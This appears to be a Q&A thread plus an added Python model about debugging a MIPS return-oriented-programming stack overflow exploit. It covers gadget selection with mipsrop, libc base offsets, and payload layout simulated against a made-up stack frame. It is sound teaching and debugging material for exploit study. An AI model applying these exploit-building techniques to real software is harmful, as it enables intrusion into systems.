
I'm trying to develop my first MIPS stack-based exploit, using the ROP chain technique, with zero luck... I'm failing on the first ROP gadget and I can't figure out why. I'm following the Bowcaster Python framework and some blog posts I've googled. As the overflow I've found allows me to overwrite too few S registers (S0 and S8 only), I need to jump to a function epilogue which will set S0-S8 from the stack. I was using IDA Pro with the mipsrop plugin to locate the gadgets. I've tried gadgets from both the vulnerable binary and libc, but with the same result. I'm seeing in GDB that the $RA register is set correctly to the address I chose with mipsrop, but for some reason the S0-S8 registers are not overwritten. ASLR is not an issue here, as I can confirm by running ldd a few times. I chose a gadget at address 000112EC, using IDA Pro, which looks like this: (I can't post more images - reputation)

LOAD:000112EC lw $ra, 0x48+var_4($sp)
LOAD:000112F0 lw $fp, 0x48+var_8($sp)
LOAD:000112F4 lw $s7, 0x48+var_C($sp)
LOAD:000112F8 lw $s6, 0x48+var_10($sp)
LOAD:000112FC lw $s5, 0x48+var_14($sp)
LOAD:00011300 lw $s4, 0x48+var_18($sp)
LOAD:00011304 lw $s3, 0x48+var_1C($sp)
LOAD:00011308 lw $s2, 0x48+var_20($sp)
LOAD:0001130C lw $s1, 0x48+var_24($sp)
LOAD:00011310 lw $s0, 0x48+var_28($sp)
LOAD:00011314 jr $ra
LOAD:00011318 addiu $sp, 0x48
LOAD:00011318 # End of function scandir

I added the libc base address to it (echo 'obase=16;ibase=16;2AABE000+112EC' | bc) and got 0x2AACF2EC. As it's a big-endian processor, I sent the string like this:

AAAA and the first gadget address

Below you can see the full output from GDB :

GDB output after the hit

As you can see, only S0 and S8 were overwritten and none of the S registers were restored from the stack.

What am I doing wrong here? Please help :)

Some checksec.sh output:

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   /bin/vulnbin
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      No canary found   NX enabled    DSO             No RPATH   No RUNPATH   /lib/libc.so.0
Jane Doe

1 Answer


You have gdb output after the instructions run but not before (or during).

You should be single stepping and manually checking each load with x/wx $sp+

Could be your string was corrupted and those values in s0-s7 were in fact pulled from the stack as you asked it to do, where your buffer used to be but is now corrupted.

Also, do you have additional bytes in your overflow string after the new $ra value or does that terminate the string? If it's terminating the string then the s0-s7 registers will be filled with garbage stack data.

Bottom line: breakpoint the first load, manually x/wx $sp+X each load before it occurs and stepi and confirm the result.

If you need a static gdbserver, I have a ton for various ARM, MIPS and MIPSEL architectures/ABIs @ embedded-toolkit

adam
  • Also, I wouldn't rely too heavily on a framework until you've done it "by hand" at least a few times. Can't emphasize this enough – adam May 17 '17 at 17:54
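The check the answer describes (what "x/wx $sp+X" must show before each load, and what the registers end up with when the string stops right after the gadget address) can be modelled before touching gdb. The script below is an added example and is not code from the question, the answer, or Bowcaster; it is in Python because that is what the asker is already driving Bowcaster with. The gadget listing and the 0x2AACF2EC sum are the question's own; the vulnerable function's frame size (0x40), the buffer offset (0x10), the stale stack contents, and NEXT_GADGET are assumptions made up for the model. It parses IDA's `0x48+var_N($sp)` operands into plain $sp offsets, emits the x/wx commands to run before each stepi, and then simulates the epilogue against three constructed payloads: a full one, one that ends at the gadget address, and one where a chosen register value contains a NUL byte and a strcpy-style copy stops early.

```python
import re
import struct

# The scandir epilogue gadget quoted in the question, pasted as the IDA listing.
GADGET_LISTING = """
LOAD:000112EC lw $ra, 0x48+var_4($sp)
LOAD:000112F0 lw $fp, 0x48+var_8($sp)
LOAD:000112F4 lw $s7, 0x48+var_C($sp)
LOAD:000112F8 lw $s6, 0x48+var_10($sp)
LOAD:000112FC lw $s5, 0x48+var_14($sp)
LOAD:00011300 lw $s4, 0x48+var_18($sp)
LOAD:00011304 lw $s3, 0x48+var_1C($sp)
LOAD:00011308 lw $s2, 0x48+var_20($sp)
LOAD:0001130C lw $s1, 0x48+var_24($sp)
LOAD:00011310 lw $s0, 0x48+var_28($sp)
LOAD:00011314 jr $ra
LOAD:00011318 addiu $sp, 0x48
"""

LW_RE = re.compile(r"lw\s+\$(\w+),\s*0x([0-9A-Fa-f]+)\+var_([0-9A-Fa-f]+)\(\$sp\)")
ADDIU_RE = re.compile(r"addiu\s+\$sp,\s*0x([0-9A-Fa-f]+)")

def parse_epilogue(listing):
    """Return ([(reg, offset_from_sp), ...], frame_size) in execution order.
    IDA's var_N means -N, so '0x48+var_4($sp)' is a load from $sp+0x44."""
    loads = [(m.group(1), int(m.group(2), 16) - int(m.group(3), 16))
             for m in LW_RE.finditer(listing)]
    frame = int(ADDIU_RE.search(listing).group(1), 16)
    return loads, frame

def gdb_checks(loads):
    """The 'x/wx $sp+X' commands to run before each load, in the order the loads execute."""
    return ["x/wx $sp+0x%x" % off for _, off in loads]

def simulate_epilogue(stack, sp, loads, frame):
    """Model the gadget on a stack image: each lw reads the big-endian word at sp+off
    (what x/wx shows before the stepi); the addiu in the delay slot then pops the frame."""
    regs = {reg: struct.unpack_from(">I", stack, sp + off)[0] for reg, off in loads}
    return regs, sp + frame

def gadget_frame(loads, frame, wanted, filler=b"A"):
    """The frame_size bytes that must sit at the gadget's $sp: wanted[reg] at each
    load's offset, filler everywhere else (including slots you do not care about)."""
    buf = bytearray(filler * frame)
    for reg, off in loads:
        if reg in wanted:
            struct.pack_into(">I", buf, off, wanted[reg])
    return bytes(buf)

# Hypothetical vulnerable frame (NOT from the question): 0x40 bytes, the overflowed
# buffer starts at $sp+0x10 and the saved $ra is the last word of the frame.
VULN_FRAME = 0x40
BUF_OFF = 0x10
LIBC_BASE = 0x2AABE000
GADGET = LIBC_BASE + 0x112EC        # 0x2AACF2EC, the sum computed in the question
NEXT_GADGET = 0x2AAD1234            # placeholder for whatever the chain does next

def strcpy_overflow(stack, payload):
    """Copy the payload into the buffer the way strcpy would: up to and including the
    first NUL. Whatever was on the stack beyond that point stays exactly as it was."""
    nul = payload.find(b"\x00")
    copied = payload if nul < 0 else payload[:nul + 1]
    image = bytearray(stack)
    image[BUF_OFF:BUF_OFF + len(copied)] = copied
    return bytes(image)

def run_chain(payload):
    """Overflow a constructed stale stack, return through the overwritten $ra, and run
    the gadget with $sp already past the vulnerable frame (its own epilogue popped it)."""
    stale = bytes(range(0x100))      # constructed: the word at offset X reads X,X+1,X+2,X+3
    image = strcpy_overflow(stale, payload)
    ra = struct.unpack_from(">I", image, VULN_FRAME - 4)[0]
    if ra != GADGET:
        return {"ra": ra, "regs": None}   # never reached the gadget
    loads, frame = parse_epilogue(GADGET_LISTING)
    regs, _ = simulate_epilogue(image, VULN_FRAME, loads, frame)
    return {"ra": ra, "regs": regs}

def full_payload(wanted):
    """Filler up to the saved $ra, the gadget address, then the frame the gadget consumes."""
    loads, frame = parse_epilogue(GADGET_LISTING)
    return (b"A" * (VULN_FRAME - 4 - BUF_OFF) + struct.pack(">I", GADGET)
            + gadget_frame(loads, frame, wanted))

def truncated_payload():
    """The string ends right after the gadget address (the case the answer asks about)."""
    return b"A" * (VULN_FRAME - 4 - BUF_OFF) + struct.pack(">I", GADGET)

WANTED = {"s%d" % i: 0x11111111 * (i + 1) for i in range(8)}
WANTED["ra"] = NEXT_GADGET

if __name__ == "__main__":
    print(gdb_checks(parse_epilogue(GADGET_LISTING)[0]))
    for name, p in [("full", full_payload(WANTED)), ("truncated", truncated_payload()),
                    ("nul in s0", full_payload({**WANTED, "s0": 1}))]:
        print(name, {k: "%08x" % v for k, v in run_chain(p)["regs"].items()})
```

With the truncated payload the model reproduces the symptom in the question: $ra does point at the gadget, but every lw reads whatever was already above the vulnerable frame, so s0-s7 and the gadget's own $ra come back as stale stack words. With the full payload the gadget's frame is the next 0x48 bytes of the string and the registers come back as chosen. The third case shows why a register value with a 0x00 byte (here s0 = 1) is just as bad as a short string: the copy stops at the NUL, and since s0 is the lowest slot, s1 through $ra are stale too.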